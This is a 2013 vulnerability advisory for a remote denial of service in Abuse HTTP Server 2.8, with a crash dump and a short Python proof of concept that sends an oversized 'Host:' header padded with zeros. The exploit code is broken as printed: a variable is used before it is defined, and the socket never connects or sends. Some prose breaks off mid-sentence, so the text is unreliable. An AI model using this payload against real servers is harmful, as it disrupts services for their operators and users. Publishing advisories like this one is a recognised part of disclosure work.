Title : Abuse HTTP Server 2.8 - Remote Denial Of Service

Advisory ID : Cr02013-002

Vulnerable Version(s) : 2.8 and probably prior release

Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]

CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)

Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com

   

   

  

Abuse HTTP Server is a small program designed to become a WebServer.

   

- Based on / Copied from : http://abuse-httpd.sourceforge.net/

   

   

Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server.

   

   

and the connection between server and android client will be disconected or terminated.

   

  

 Address=7C8106E9 (crash address)

 Message=New thread with ID 000006D0 created

 Message=Thread 000006D0 terminated, exit code 0

 Message=Thread 00000794 terminated, exit code CB (203.)

  

  

ECX 7C800000 kernel32.7C800000

EDX 7C97B120 ntdll.7C97B120

ESI 7C90DE50 ntdll.ZwTerminateProcess

EIP 7C90E4F4 ntdll.KiFastSystemCallRet

C 0  ES 0023 32bit 0(FFFFFFFF)

P 1  CS 001B 32bit 0(FFFFFFFF)

A 0  SS 0023 32bit 0(FFFFFFFF)

Z 1  DS 0023 32bit 0(FFFFFFFF)

S 0  FS 003B 32bit 7FFDE000(FFF)

T 0  GS 0000 NULL

O 0  LastErr ERROR_CLASS_HAS_WINDOWS (00000584)

EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)

ST0 empty -??? FFFF 00FF00FF 00FF00FF

ST1 empty -??? FFFF 00FF00FF 00FF00FF

ST2 empty -??? FFFF 00FE00B2 006E007A

ST3 empty -??? FFFF 00FE00B2 006B0077

ST5 empty -??? FFFF 00FF00B3 006B0077

ST6 empty -??? FFFF 00000000 00000000

ST7 empty -??? FFFF 00800080 00800080

               3 2 1 0      E S P U O Z D I

FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)

FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

  

  

0012FC50   kernel32.7C839AC0

0012FCA8   Abuse.0040D7E3

0012FD78   USER32.7E44048F

0012FDD8   USER32.7E44048F

0012FEF0   USER32.7E44048F

0012FF50   USER32.7E44048F

0012FFE0   kernel32.7C839AC0

   

Sample dummy tool for disconected only

  

--- Python Remote DOS code ---

  

  

import socket

import os

import sys

  

crash = "0" * 504

  

buffer+="Host: " + crash + "\r\n"

  

print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"

print "[*] Change some option in code with your self"

print "[*] Connect to host and send payload"

  

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )

print "[*] Server Disconected"

  

------------- EOF -------------

  

29/09/2013 :    Vendor Contacted / No response.

30/09/2013 :    Public Disclosure.

   

   

There isn't remediation step from the Vendor until this Public Disclosure.

   

   

- Common Weakness Enumeration (CWE) - http://cwe.mitre.org

- Share KM - http://abuse-httpd.sourceforge.net/

   

   

Cr0security is a company that moved on "Information and Technologies" especially

on Computer Security System, Network Security, and Secure Computer Application

technology with better security, Cr0security ready to help you to reach secure point

and creating a comfortable moment while you are perform any activities through your

networks or computers at once. In computer software development we also implement the

"Secure Programming". so security of the applications, the data, and the computer will

   

   

   

   

The information provided in this advisory is provided "as is" without warranty

of any kind. Cr0security disclaims all warranties, either express or implied,

including the warranties of merchantability and fitness for a particular purpose.

In no event shall Cr0security or its suppliers be liable for any damages whatsoever

special damages, even if Cr0security or its suppliers have been advised of the

possibility of such damages. Some states do not allow the exclusion or limitation

of liability for consequential or incidental damages so the foregoing limitation may

not apply.